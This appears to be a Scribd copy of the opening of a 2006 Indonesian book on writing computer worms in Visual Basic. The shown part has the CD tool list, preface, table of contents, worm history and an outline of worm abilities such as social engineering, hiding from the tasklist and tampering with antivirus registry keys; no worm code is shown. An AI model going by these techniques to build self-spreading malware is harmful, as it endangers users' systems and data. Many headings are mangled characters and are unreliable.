P. 1
Computer WoRm 1

Computer WoRm 1

|Views: 21|Likes:
Published by Ong Alie

More info:

Published by: Ong Alie on Jul 26, 2012
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

10/31/2012

pdf

text

original

Hak Cipta dilindungi Undang-Undang.

Dilarang memperbanyak atau memindahkan
sebagian atau seluruh isi buku ini dalam bentuk apapun, baik secara elektronis maupun
mekanis, termasuk memfotocopy, merekam atau dengan sistem penyimpanan lainnya,
tanpa izin tertulis dari Penulis dan Penerbit.
I SBN 979- 1090- 01- 7
Cetakan pertama : Juli 2006
Computer Worm 1 - Secret of Underground Coding
Hak Cipta
©
2006 pada penulis
Ketentuanpidanapasal72UUNo.19tahun2002
1. Barangsiapadengansengajadantanpahakmelakukankegiatansebagaimanadimaksuddalampasal2ayat
(1)ataupasal49ayat(1)danayat(2)dipidanadenganpidanapenjarapalingsingkat1(satu)bulandan/atau
dendapalingsedikitRp.1.000.000(satujutarupiah)ataupidanapenjarapalinglama7(tujuh)tahundan/
ataudendapalingbanyakRp.5.000.000.000.00(limamiliarrupiah).
2. Barangsiapadengansengajamenyiarkan,memamerkan,mengedarkan,ataumenjualkepadaumumsuatu
CiptaanataubaranghasilpelanggaranHakCiptaatauHakTerkaitsebagaimanadimaksudpadaayat(1),dipi-
danadenganpidanapenjarapalinglama5(lima)tahundan/ataudendapalingbanyakRp.500.000.000,00
(limaratusjutarupiah)
Publisher
Jasakom
Web Site
http://www.jasakom.com/penerbitan
Email
admin@jasakom.com
Address
PO BOX 6179 JKB
0empätcr Nerm 1
8ccrct e| 0ä1crqreää1 0e1|äq
Buku ini disertai dengan sebuah CD pendukung yang berisi flm
tutorial sehingga pembaca bukan saja hanya membaca buku tetapi
juga bisa melihat langsung teknik pembuatan suatu worm komputer,
kemudian kumpulan source code / listing code yang digunakan pada
buku dan beberapa program pendukung sebagai berikut:
0|H0Nâ8|
VM Ware 55.9 MB
Virtual PC 17.1 MB
DeepFreeze 2.06 MB
ShadowUser 7.80 MB
ASPack 297 KB
UltraEdit 1.69 MB
|8||Nâ8|
A Squared HijackFree 497 KB
CXUPX 419 KB
Darmal’s Packer 730 KB
DOS 7.10 765 KB
DropFile Script Generator 21.5 KB
HHD Hex Editor 2.07 MB
Icon Sucker Std 658 KB
KillBox 67,5 KB
Petite 117 KB
Process Explorer 1.24 MB
Registrar Lite 2.28 MB
Resource Hacker 1.32 MB
UPX 1.25 163 KB
UPX Mutanter 38.9 KB
UPX Scrambler 17.5 KB
UPX Windows GUI 199 KB
| 8 | 0 0 P | N 0 0 K 0 N 0
Jasakom
r
0
e
m
p
ä
t
c
r

N
e
r
m

1

·

8
c
c
r
c
t

e
|

0
ä
1
c
r
q
r
e
ä
ä
1

0
e
1
|
ä
q
Kâ¡â P|N0âN¡â8
Puji syukur ke hadirat Allah SWT, atas berkat dan rahmat-Nya pula
sehingga penulis dapat menyelesaikan penulisan buku: Computer
Worm ini dengan baik. Hingga buku ini selesai ditulis, penulis belum
mendapatkan adanya buku yang khusus membahas mengenai worm
komputer baik dengan mengunjungi ke toko-toko buku secara langsung
maupun berkunjung secara online. Sedangkan hal ini sangat penting
sekali, terlebih pada saat buku ini disusun dimana perkembangan dan
tingkat penyebaran worm lokal di Indonesia sangat tinggi dan cende-
rung semakin mengganas.
Ironisnya banyak sekali pengguna komputer yang tidak mengerti per-
bedaan antara worm dan virus, sehingga worm seringkali diasumsikan
sebagai suatu virus komputer dan banyak pula yang berasumsi bahwa
worm merupakan suatu sub-class dari virus komputer, memang suatu
kesalahan umum sehingga penulispun terkadang menggunakan istilah
ini , lagipula penulis tidak berminat menjelaskan arti worm komputer
(yang akan berbuntut dengan penjelasan panjang lebar tentang per-
bedaannya dengan virus komputer) setiap kali penulis menyebutkan
istilah worm komputer , penulis berpendapat momen inilah yang
paling tepat untuk menjelaskannya kepada pembaca semua.
Buku ini bertujuan untuk menjelaskan kepada para pembaca, apa
sesungguhnya worm komputer itu, apa perbedaanya dengan virus
komputer, dan bagaimana worm tersebut diprogram.
Buku ini tidak hanya membahas tentang worm komputer saja, tetapi juga
memuat beberapa materi standar yang harus diketahui dalam rangka
membuat atau memerangi suatu worm komputer. Penulis berharap
buku ini dapat menambah pengetahuan bagi penggemar TI, system
administrator atau siapa saja yang selalu menggunakan komputer, dan
bukan untuk mengajari hal-hal negatif kepada para pemula, tapi seba-
| 8 | 0 0 P | N 0 0 K 0 N 0
Jasakom
r|
0
e
m
p
ä
t
c
r

N
e
r
m

1

·

8
c
c
r
c
t

e
|

0
ä
1
c
r
q
r
e
ä
ä
1

0
e
1
|
ä
q
liknya memberi kesadaran kepada mereka yang senantiasa melakukan
hal-hal negatif untuk menghentikan tindakan negatif tersebut, lebih
baik lagi apabila mereka juga memberi kontribusi untuk menghentikan
perkembangan worm komputer dan malcode lainnya di bumi pertiwi
ini. Membahas pembuatan suatu worm memerlukan pengertian akan
tanggung jawab moral yang besar, karena worm komputer dapat
menimbulkan dampak yang sangat fatal dan merugikan maka penulis
sangat mengharapkan kebaikan moral para pembaca, selain itu penulis
tidak bertanggung jawab apabila ada penyalahgunaan atas informasi,
script atau program-program yang disertakan bersama buku ini.
Dalam kesempatan ini, penulis mengucapkan terima kasih kepada
kedua orang tua penulis, seluruh dosen POLNES (Politeknik Negeri
Samarinda) khususnya untuk Bapak Ruslan Ardi dan Bapak Arkas
Viddy, kemudian salam penulis untuk alumni SMK Negeri 1 Tarakan
angkatan 95 – 98, dan alumni POLNES angkatan 98 – 2001, salam juga
untuk teman-teman di AMIK PPKIA Tarakan. Tidak lupa pula penulis
mengucapkan terima kasih kepada penerbit Jasakom yang berkenan
menerbitkan buku ini, special thank’s buat S’to yang sudah banyak
membantu dalam proses pembentukan buku.
Akhir kata penulis penulis menyadari adanya kekurangan-kekurangan
pada buku ini, maka dengan tidak merendahkan diri, penulis meng-
harapkan kritik dan saran yang bersifat membangun, untuk itu silah-
kan kirim e-mail Anda ke alamat e-mail penulis di: achmad_darmal@
yahoo.com.sg, dengan subjek: worm komputer (untuk menghindari
spam mail, penulis membuat agar e-mail dengan subjek lain akan
segera dihapus secara otomatis).
"Dengan mengetahui, mengerti dan menguasai teknik
pembuatan suatu virus, worm atau malcode lainnya,
sesungguhnya sudah tidak dibutuhkan tutorial lain
untuk memeranginya."
Jasakom
r||
0
e
m
p
ä
t
c
r

N
e
r
m

1

·

8
c
c
r
c
t

e
|

0
ä
1
c
r
q
r
e
ä
ä
1

0
e
1
|
ä
q
0z|tzr |r|
KATA PENGANTAR v
BAB 1 PENDAHULUAN 1
BAB 2 MENGENAL WORM 5
2.1 ASAL MULA WORM KOMPUTER 6
2.2 PERBEDAAN WORM DAN VIRUS 8
2.3 KEMAMPUAN DASAR WORM 9
2.3.1 KEMAMPUAN REPRODUKSI DAN DISTRIBUSI 9
2.3.2 KEMAMPUAN REKAYASA SOSIAL 9
2.3.3 KEMAMPUAN MENYEMBUNYIKAN DIRI 10
2.3.4 KEMAMPUAN MENDAPATKAN INFORMASI 10
2.3.5 KEMAMPUAN MENGADAKAN MANIPULASI 10
2.4 SIKLUS HIDUP WORM 11
2.4.1 PROPAGATION PHASE ( FASE PENYEBARAN ) 11
2.4.2 DORMANT PHASE ( FASE ISTIRAHAT/TIDUR ) 11
2.4.3 TRIGERRING PHASE ( FASE AKTIF ) 11
2.4.4 EXECUTION PHASE ( FASE EKSEKUSI ) 11
2.5 PERKEMBANGAN WORM NON LOKAL 12
2.5.1 CHRISTMA EXEC 12
2.5.2 MORRIS 12
2.5.3 HAPPY99 13
2.5.4 MELISA 13
2.5.5 PRETTY PARK 14
2.5.6 EXPLORE ZIP 14
2.5.7 BUBBLE BOY 15
2.5.8 LOVE LETTER 16
2.5.9 HYBRIS 16
Jasakom
r|||
0
e
m
p
ä
t
c
r

N
e
r
m

1

·

8
c
c
r
c
t

e
|

0
ä
1
c
r
q
r
e
ä
ä
1

0
e
1
|
ä
q
2.5.10 ANNA KOURNIKOVA 17
2.5.11 SADMIND 17
2.5.12 CODE RED 17
2.5.13 NIMDA 18
2.5.14 BADTRANS.B 19
2.5.15 KLEZ 20
2.5.16 SLAMMER 21
2.5.17 BAGLE 21
2.5.18 NETSKY 22
2.6 PERKEMBANGAN WORM LOKAL 22
2.6.1 I-WORM PERKASA 22
2.6.2 PESIN 23
2.6.3 TABARU 23
2.6.4 KANGEN 24
2.6.5 KUMIS 24
2.6.6 DECOIL 25
2.6.7 RONTOKBRO 25
2.6.8 NOBRON 25
2.6.9 RUNITIS 26
2.6.10 BLUEFANTASY 26
2.6.11 ROMDIL 27
2.6.12 MYBRO 27
2.6.13 IRCBOT.AQF 28
2.6.14 LIGHTMOON 28
BAB 3 REGISTRY WINDOWS 29
3.1 STRUKTUR REGISTRY 30
3.1.1 HIVE 31
3.1.2 VALUE 31
3.2 REGISTRY EDITOR (REGEDIT) 32
3.2.1 MEMBUKA APLIKASI REGISTRY EDITOR 32
3.2.2 LINGKUNGAN KERJA REGISTRY EDITOR 33
Jasakom
|x
0
e
m
p
ä
t
c
r

N
e
r
m

1

·

8
c
c
r
c
t

e
|

0
ä
1
c
r
q
r
e
ä
ä
1

0
e
1
|
ä
q
3.3 OPERASI DASAR REGISTRY EDITOR 33
3.3.1 BACKUP & RESTORE REGISTRY 34
3.3.2 EXPORT & IMPORT DATA REGISTRY 35
3.3.3 MANIPULASI KEY & VALUE 35
3.3.4 PENCARIAN TEKS PADA KEY, VALUE ATAU DATA 37
3.3.5 MENGGUNAKAN PERINTAH BARIS (COMMAND LINE) 38
3.3.6 MEMANFAATKAN FILE REG 39
BAB 4 MENGENAL VISUAL BASIC 6.0 41
4.1 LINGKUNGAN KERJA VISUAL BASIC 42
4.1.1 MENUBAR 43
4.1.2 TOOLBAR 43
4.1.3 PROJECT EXPLORER 43
4.1.4 PROPERTIES WINDOWS 44
4.1.5 FORM LAYOUT WINDOW 44
4.1.6 TOOLBOX 44
4.1.7 FORM WINDOW 45
4.1.8 CODE WINDOW 45
4.2 PEMBUATAN APLIKASI 46
4.2.1 MEMBUAT PROYEK 46
4.2.2 MENYISIPKAN CONTROL 47
4.2.3 SETTING PROPERTIES 47
4.2.4 MENGETIK KODE PROGRAM 47
4.2.5 MENYIMPAN PROGRAM 48
4.2.6 MENJALANKAN PROGRAM 48
4.2.7 KOMPILASI PROGRAM MENJADI EXE 49
BAB 5 OBJECT FORM DAN CONTROL 51
5.1 FORM 53
5.2 KONTROL 54
5.2.1 PICTUREBOX 55
5.2.2 LABEL 56
5.2.3 TEXTBOX 57
Jasakom
x
0
e
m
p
ä
t
c
r

N
e
r
m

1

·

8
c
c
r
c
t

e
|

0
ä
1
c
r
q
r
e
ä
ä
1

0
e
1
|
ä
q
5.2.4 FRAME 58
5.2.5 COMMANDBUTTON 58
5.2.6 CHECKBOX 59
5.2.7 OPTIONBUTTON 60
5.2.8 COMBOBOX 61
5.2.9 LISTBOX 62
5.2.10 HSCROLLBAR 63
5.2.11 VSCROLLBAR 64
5.2.12 TIMER 65
5.2.13 DRIVELISTBOX 66
5.2.14 DIRLISTBOX 66
5.2.15 FILELISTBOX 67
5.2.16 SHAPE 68
5.2.17 LINE 69
5.2.18 IMAGE 69
5.2.19 DATA 70
5.2.20 OLE 71
BAB 6 KODE PROGRAM 73
6.1 VARIABEL 74
6.1.1 IMPLICIT 75
6.1.2 EXPLICIT 76
6.2 STATEMENTS AND EXPRESSIONS 77
6.3 OPERATOR 78
6.3.1 OPERATOR PENUGASAN (ASSIGNMENT) 78
6.3.2 OPERATOR ARITMATIKA 78
6.3.3 OPERATOR KOMPARASI 79
6.3.4 OPERATOR LOGIKA 80
6.4 PERCABANGAN (BRANCHING) 81
6.4.1 PERCABANGAN IF/THEN/ELSE 81
6.4.2 PERCABANGAN SELECT CASE 82
6.4.3 PERCABANGAN GOSUB/RETURN 83
6.4.4 PERCABANGAN GOTO 83
6.4.5 PERCABANGAN ON ERROR 84
Jasakom
x|
0
e
m
p
ä
t
c
r

N
e
r
m

1

·

8
c
c
r
c
t

e
|

0
ä
1
c
r
q
r
e
ä
ä
1

0
e
1
|
ä
q
6.5 PENGULANGAN (LOOPING) 85
6.5.1 DO WHILE/LOOP 85
6.5.2 DO UNTIL/LOOP 85
6.5.3 DO/LOOP WHILE 85
6.5.4 DO/LOOP UNTIL 86
6.5.5 FOR/NEXT 86
6.6 PENGHENTIAN (TERMINATING) 87
6.6.1 END 87
6.6.2 EXIT 87
6.6.3 STOP 88
6.7 ARRAY 88
6.7.1 DEKLARASI DENGAN VARIABEL TUNGGAL 88
6.7.2 DEKLARASI DENGAN KEYWORD TO 89
6.8 PENANGANAN FILE 90
6.8.1 MENGUBAH NAMA DAN MEMINDAH FILE 90
6.8.2 MEMBUAT SALINAN / MENG-COPY FILE 91
6.8.3 MENGHAPUS FILE 91
6.8.4 MELIHAT DAN MENGUBAH ATRIBUT PADA FILE 92
6.8.5 MENGETAHUI BESAR FILE 93
6.8.6 MENGETAHUI TANGGAL DAN WAKTU FILE 94
6.8.7 MENGETAHUI DRIVE DAN DIREKTORI AKTIF 94
6.8.8 MENGATUR DRIVE AKTIF 95
6.8.9 MENGATUR DIREKTORI AKTIF 95
6.8.10 MEMBUAT DIREKTORI BARU 96
6.8.11 MENGHAPUS DIREKTORI 96
6.8.12 MENGUBAH NAMA DIREKTORI 97
6.9 OPERASI FILE TEXT 97
6.9.1 MEMBUAT FILE TEXT 97
6.9.2 MEMBACA FILE TEXT 98
6.10 OPERASI FILE BINARY 99
6.10.1 MEMBUAT FILE BINARY 99
6.10.2 MEMBACA FILE BINARY 100
6.11 FILE SYSTEM OBJECT (FSO) 101
Jasakom
x||
0
e
m
p
ä
t
c
r

N
e
r
m

1

·

8
c
c
r
c
t

e
|

0
ä
1
c
r
q
r
e
ä
ä
1

0
e
1
|
ä
q
BAB 7 WORM WSar.1 103
7.1 WORM DASAR 1 105
7..2 ALGORITMA 106
7.3 PEMROGRAMAN 106
BAB 8 WORM WSar.2 117
8.1 ALGORITMA 117
8.2 PEMROGRAMAN 118
BAB 9 WORM WSar.3 125
9.1 ALGORITMA 125
9.2 PEMROGRAMAN 126
BAB 10 WORM WSar.4 135
10.1 ALGORITMA 135
10.2 PEMROGRAMAN 136
BAB 11 WORM WSar.5 151
11.1 ALGORITMA 152
11.2 PEMROGRAMAN 153
BAB 12 WORM WSar.6 165
12.1 ALGORITMA 166
12.2 PEMROGRAMAN 166
BAB 13 WORM WSar.7 179
13.1 COMPARISON METHODE 180
13.2 ALGORITMA 191
13.3 PEMROGRAMAN 191
Jasakom
x|||
0
e
m
p
ä
t
c
r

N
e
r
m

1

·

8
c
c
r
c
t

e
|

0
ä
1
c
r
q
r
e
ä
ä
1

0
e
1
|
ä
q
BAB 14 WORM WSar.8 207
14.1 WATCHER METHODE 208
14.2 ENCRYPTION METHODE 209
14.3 POLYMORPHIC METHODE 212
14.4 ALGORITMA 214
14.5 PEMROGRAMAN 215
BAB 15 WORM WSar.9 243
15.1 DROP FILE METHODE 244
15.2 ALGORITMA 250
15.3 PEMROGRAMAN 251
1
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

1
.

P
e
n
d
a
h
u
l
u
a
n
8â8 1
P|N0â00|0âN
S
eiring dengan pesatnya kemajuan teknologi informasi khususnya
dibidang teknologi komputer dan jaringan, keamanan menjadi
isu yang kerap kali dibahas, mulai dari ancaman langsung para
cracker atau hacker jahat hingga ancaman yang dilakukan melalui
suatu program yang disebut malcode (malicious code). Suatu program
atau script apapun yang bersifat merusak atau merugikan dapat
dikategorikan sebagai malcode termasuk virus komputer, worm atau
trojan horse.
Maraknya penyebaran virus, worm atau trojan horse, ternyata semakin
memberikan semangat bagi para pembuat worm lokal untuk terus
berkarya. Di Indonesia sendiri worm lokal mulai menunjukan aktiftas
yang cukup signifkan di awal era millenium, pada tahun 2003 peng-
guna komputer di Indonesia disibukkan oleh sebuah worm lokal yang
diperkirakan berhasil menginfeksi ribuan komputer di Indonesia.
t
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

1
.

P
e
n
d
a
h
u
l
u
a
n
Worm ini kemudian oleh salah satu perusahaan antivirus terkenal
diberi nama w32/pesin.worm.gen, bersamaan dengan munculnya
varian-varian worm Pesin yang baru, ikut muncul sejumlah worm
lokal lainnya seperti diberitakan sebuah situs Indonesia yang konsen
terhadap malcode, www.vaksin.com.
Bahkan pada saat buku ini ditulis, aktiftas worm di Indonesia semakin
meningkat, terbukti dari sejumlah forum, penulis menemukan beberapa
posting yang menunjukan adanya gejala-gejala penyebaran worm lokal
yang baru. Motif yang digunakan semakin beragam, mulai dari hanya
sekedar "pamer", sampai dengan pengrusakan dan pencurian data.
Media penyebaran pun semakin canggih mulai dari disket, USB fash
disk sampai dengan jaringan termasuk internet. Namun satu hal yang
pasti, penyebaran worm tersebut telah membawa dampak yang cukup
besar bagi para pengguna komputer baik materiil maupun non mate-
riil.
Penulis berharap buku ini dapat menambah pengetahuan bagi pengge-
mar TI, system administrator atau siapa saja yang selalu menggunakan
komputer, dan bukan untuk mengajari hal-hal negatif kepada para
pemula, tapi sebaliknya memberi kesadaran kepada mereka yang
senantiasa melakukan hal-hal negatif untuk menghentikan tindakan
negatif tersebut. Lebih baik lagi apabila mereka juga memberi kontri-
busi untuk menghentikan perkembangan worm komputer dan malcode
lainnya di bumi pertiwi ini.
Buku ini akan menunjukan bagaimana seorang worm writer membuat
suatu worm komputer, dan bagaimana memerangi worm tersebut
dengan cara yang nyaris sama. Secara umum buku ini akan membi-
carakan tujuh hal bidang utama, yaitu:
1. Mengenal worm komputer
2. Menggunakan registry pada Microsoft Windows
3. Menggunakan Visual Basic 6.0
4. Pemrograman worm komputer
5. Membuat program removal
6. Pemrograman virus komputer
7. Kompresi dengan UPX
8
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

1
.

P
e
n
d
a
h
u
l
u
a
n
Buku ini juga disertai sebuah CD yang berisi video tutorial untuk
menambah pemahaman Anda dalam mempelajari buku ini, kemudian
kumpulan source code yang digunakan sebagai latihan dan beberapa
program-program pendukung.
Perlu Anda ketahui bahwa seluruh software tersebut berlisensi free-
ware (gratis) dan freetrial (gratis coba) sehingga Anda tidak dikenakan
biaya apapun untuk software tersebut kecuali biaya CD dan ongkos
pembuatannya, penulis tak lebih hanya men-download-kannya untuk
Anda.
Membahas pembuatan suatu worm memerlukan pengertian akan tang-
gung jawab moral yang besar, karena worm komputer dapat menim-
bulkan dampak yang sangat fatal dan merugikan maka penulis sangat
mengharapkan kebaikan moral para pembaca. Selain itu, penulis tidak
bertanggung jawab apabila ada penyalahgunaan atas informasi, script
atau program-program yang disertakan bersama buku ini.
"Dengan mengetahui, mengerti dan menguasai teknik
pembuatan suatu virus, worm atau malcode lainnya,
sesungguhnya sudah tidak dibutuhkan tutorial lain
untuk memeranginya."
5
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
8â8 t
H|N0|Nâ| N08H
Kenapa bab ini ada?
Seorang administrator sistem bisa dengan cepat mengetahui
apabila suatu worm yang sama menginfeksi sebuah sistem
dengan melihat gejala yang ditimbulkan. Selain itu untuk
membuat suatu program removal juga diperlukan pengetahuan
tentang worm, dan pengetahuan tersebut bisa berupa teori,
sejarah perkembangan atau catatan singkat tentang worm
yang pernah ada.
8
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
t.1 â8â| H0|â N08H K0HP0¡|8
G
agasan worm dan virus berawal pada tahun 1949, saat seorang
founder Electronic Discrete Variable Automatic Computer
(EDVAC), John Von Newman, memaparkan dalam sebuah
papernya yang berjudul "Theory and Organization of Complicated
Automata", dibahas suatu kemungkinan bahwa suatu program dapat
melakukan penyebaran dengan sendirinya.
Kemudian pada tahun 1960-an, para peneliti AT&T Bell Laboratory
membuat semacam permainan dengan menciptakan suatu program
yang dapat memusnahkan program ciptaan lawan, dan mampu ber-
tahan terhadap serangan program lawan lainnya.
Pada akhirnya si-pemenang adalah pemilik program yang tersisa paling
banyak. Para peneliti sadar akan bahaya program tersebut, maka setiap
selesai permainan program tersebut selalu dimusnahkan.
Cikal bakal program worm pertama kali dibuat oleh Bob Thomas pada
tahun 1971. Program ini merupakan solusi dari kebutuhan system
kendali lalu lintas udara.
Program ini akan membantu mengingatkan operator apabila
pengendalian suatu pesawat udara berpindah dari satu komputer ke
komputer lainnya. Sesungguhnya program yang disebut "creeper" ini
hanya berpindah dari layar ke layar pada jaringan, dengan menampil-
kan pesan "I’m creeper! Catch me if you can!". Tetapi program creeper
tidak mereproduksi dirinya sendiri, hingga beberapa programmer lain
mencoba membuat program serupa, tetapi gagasan tersebut berang-
sur-angsur hilang dalam beberapa bulan kemudian.
Istilah "virus" mungkin sudah tidak asing terdengar, dapat dikatakan
hampir setiap orang yang mengenal komputer juga mengenal istilah
ini, sementara istilah "worm" tidak begitu dikenal, padahal istilah ini
diciptakan oleh John Shoch dan Jon Hupp di Xerox PARC (Palo Alto
Research Centre) pada tahun 1979 sebelum istilah virus komputer
dipublikasikan.
Istilah worm ini ternyata diilhami oleh suatu program "tapeworm"
(cacing pita) dalam sebuah novel fksi ilmiah karangan John Brun-
ner yang berjudul "The Shockwave Rider", yang mengisahkan suatu
I
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
pemerintahan totaliter yang mengendalikan warga negaranya melalui
suatu jaringan komputer.
Untuk memerangi hal itu akhirnya seorang pahlawan dalam novel
tersebut kemudian memenuhi jaringan dengan suatu program yang
disebut "tapeworm" sehingga memaksa mematikan jaringan komputer
yang secara otomatis juga menghilangkan kendali pemerintah terha-
dap warga negaranya.
Kemudian diawal tahun 1980 John Shoch dan Jon Hupp mengadakan
sebuah penelitian dengan mengembangkan lima buah program worm,
masing-masing worm dibuat dengan tujuan tertentu yang membantu
jaringan disekitarnya.
Beberapa worm terlihat sederhana, seperti worm "town crier" yang
bertugas memasuki jaringan hanya untuk menampilkan pengumu-
man. Worm lainnya terlihat lebih kompleks dan pintar, seperti worm
"vampire".
Worm ini tidak akan melakukan kegiatan pada siang harinya, tetapi saat
malam hari worm akan melakukan suatu kegiatan tertentu yang telah
terprogram sebelumnya, ini berguna untuk memanfaatkan komputer
yang tidak bekerja pada malam hari dengan memberikan tugas yang
kompleks dan memerlukan daya proses yang lebih. Saat fajar, worm
akan menghentikan pekerjaannya dengan terlebih dahulu menyimpan
seluruh pekerjaan yang dilakukannya malam itu dan menunggu sore
berikutnya.
Walau bagaimanapun, walaupun program ini berguna tapi disadari
bahwa program ini juga akan sangat berbahaya apabila salah digu-
nakan. Hal ini terbukti saat sebuah worm mengalami malfungsi pada
suatu malam dan keesokan harinya para pekerja menemukan seluruh
komputer yang ada pada jaringan tersebut mengalami crash (suatu
kerusakan dimana system output dan input tidak berfungsi).
Lebih dari itu saat komputer dihidupkan kembali, worm malfungsi
tersebut kembali membuat komputer crash. Pada akhirnya dibuat
semacam vaksin untuk mencegah worm tersebut, dan mulai saat itu
penelitian terhadap worm tersebut ditutup untuk umum.
8
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
t.t P|88|0ââN N08H 0âN V|808
Istilah "virus" selalu digunakan sebagai suatu acuan umum untuk
setiap malcode (program atau script yang dibuat dengan tujuan mem-
bahayakan atau merugikan sebuah system komputer), seperti worm,
trojan bahkan hoax yang sesungguhnya bukan sebuah virus komputer,
berikut adalah beberapa jenis malcode tersebut:
1. Computer virus: merujuk pada program yang memiliki kemam-
puan untuk ber- reproduksi, menulari program lain dan menjadi-
kan fle-fle program tertular sebagai fle infector.
2. Computer worm: merujuk pada program independen yang
memiliki kemampuan untuk ber-reproduksi, menulari system
komputer dan walaupun mampu untuk menulari program lain
namun tidak bertujuan untuk menjadikan fle tertular tersebut
sebagai suatu fle infector.
3. Trojan horse: merujuk pada program independen yang tampaknya
berguna, dan ketika dieksekusi, tanpa sepengetahuan pengguna,
juga melaksanakan fungsi-fungsi yang bersifat destruktif dan
merugikan.
4. Malicious toolkits: merujuk pada program yang didesain untuk
membantu menciptakan program-program yang dapat memba-
hayakan sebuah system komputer. Contoh dari program jenis
ini adalah tool pembuat virus dan program yang dibuat untuk
membantu proses cracking atau hacking.
Dari beberapa keterangan diatas dapat diperjelas bahwa worm adalah
suatu algoritma atau program yang mereproduksi diri sendiri dari
system ke system dengan menggunakan media penyimpanan atau
suatu jaringan.
Worm tidak menginfeksi fle program lain dengan tujuan menjadikan
fle terinfeksi tersebut sebagai fle infector. Worm mampu bekerja
8
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
tanpa interaksi user, bisa merusak sebuah data secara langsung atau
menurunkan kinerja system dengan "mengikat" sumber daya system
komputer dan bahkan bisa mematikan sebuah jaringan. Berbeda
dengan virus yang melakukan infeksi dengan 'menumpang’ pada fle
program lain, menunggu interaksi user dan menjadikan fle terinfeksi
sebagai fle infector.
t.8 K|HâHP0âN 0â8â8 N08H
Worm umumnya memiliki kemampuan-kemampuan dasar berikut
ini:
2.3.1 KEMAMPUAN REPRODUKSI DAN DISTRIBUSI
Yaitu kemampuan yang mutlak dimiliki suatu worm untuk membuat
salinan dirinya, sekaligus mendistribusikan salinan tersebut pada
system yang lain baik melalui media penyimpanan seperti disket,
USB fash disk maupun melalui suatu jaringan komputer. Walaupun
memiliki rutin untuk menginfeksi program lain namun tidak bertujuan
menjadikan fle program terinfeksi menjadi suatu fle infector.
Pada awalnya worm dibuat dengan aksi memenuhi harddisk dan
jaringan, namun seiring dengan perkembangan teknologi informasi
hal ini akhirnya banyak ditinggalkan worm writer karena malah akan
mengurangi kemampuannya untuk menyembunyikan diri, yang akan
berakibat worm tersebut cepat "terendus" oleh advanced user atau
bahkan perusahaan-perusahaan antivirus.
2.3.2 KEMAMPUAN REKAYASA SOSIAL
Karena fle infector worm akan aktif saat user mengeksekusinya maka
social engineering atau rekayasa sosial menjadi hal yang sangat penting
bagi suatu worm.
10
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
Layaknya seorang penjual yang mati-matian merayu calon pembeli
maka worm akan 'merias’ programnya dengan icon dan nama yang
sangat memikat agar user mengeksekusinya. Suatu worm bisa saja
membuat salinan dirinya dengan nama fle 'porno’ dan dengan gambar
icon yang sangat tidak mencurigakan.
2.3.3 KEMAMPUAN MENYEMBUNYIKAN DIRI
Menjaga tetap tidak diketahui adalah penting untuk worm jaman seka-
rang agar tetap bertahan pada suatu system. Hal ini biasanya dilaku-
kan dengan cara tidak menampilkan sesuatu dari worm baik berupa
suara maupun tampilan visual, menyembunyikan program worm dari
taskbar bahkan dari jendela tasklist.
2.3.4 KEMAMPUAN MENDAPATKAN INFORMASI
Suatu worm harus bisa mendapatkan informasi yang ia butuhkan,
seperti jenis sistem operasi yang digunakan, direktori root, direktori
System Windows bahkan worm umumnya memeriksa suatu system
apakah telah terpasang antivirus atau tidak, lebih jauh lagi worm akan
berusaha mengenali jenis antivirus yang terpasang.
2.3.5 KEMAMPUAN MENGADAKAN MANIPULASI
Umumnya manipulasi dilakukan oleh worm untuk bertahan hidup,.
Worm cenderung mengadakan manipulasi pada registry agar worm
bisa tetap aktif saat komputer dihidupkan, bahkan memanipulasi reg-
istry milik suatu antivirus agar tidak mengganggu worm tersebut. Tapi
worm bisa saja mengadakan manipulasi yang terlepas dari tujuan tadi,
seperti mengubah volume label pada harddisk atau disket.
11
Jasakom
Computer Worm 1 - Secret of Undeground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
t.1 8|K|08 0|00P N08H
Siklus hidup worm secara umum, melalui 4 tahap:
2.4.1 PROPAGATION PHASE ( FASE PENYEBARAN )
Pada fase ini worm akan membuat salinan dirinya ke suatu tempat,
baik pada media penyimpanan fx disk (tetap) atau removable disk
(dapat dipindahkan), adapun penyebarannya dapat dilakukan pada
system lokal, jaringan atau internet.
2.4.2 DORMANT PHASE ( FASE ISTIRAHAT/TIDUR )
Pada fase ini worm tidaklah aktif. Worm akan diaktifkan oleh suatu
kondisi tertentu, semisal: tanggal yang ditentukan, kehadiran program
lain/dieksekusinya program lain, dan sebagainya. Tidak semua worm
melalui fase ini.
2.4.3 TRIGERRING PHASE ( FASE AKTIF )
Di fase ini worm tersebut akan aktif dan menetap pada memory, hal ini
dipicu oleh metode launcher yang digunakan worm tersebut.

2.4.4 EXECUTION PHASE ( FASE EKSEKUSI )
Pada fase inilah worm yang telah aktif tadi akan melakukan fungsinya.
Seperti menghapus fle, menampilkan pesan-pesan dan sebagainya.
1t
Jasakom
Computer Worm 1 - Secret of Underground Coding : Uncensored

B
a
b

2
.

M
e
n
g
e
n
a
l

W
o
r
m
t.5 P|8K|H8âN0âN N08H N0N |0Kâ|
Berikut ini beberapa catatan singkat tentang worm yang pernah ada
dan membuat banyak kerugian para pengguna komputer.
2.5.1 CHRISTMA EXEC
Pada tanggal 9 Desember 1987, worm "Christma Exec" menjadi worm
pertama yang mampu menyebar dengan menggunakan media e-mail
diantara komputer mainframe IBM. Worm ini juga menjadi contoh
penggunaan social engineering, dengan mengajak user untuk mengek-
sekusi worm tersebut dengan dalih akan menampilkan gambar pohon
natal.
Worm tersebut memang menghasilkan gambar pohon natal pada
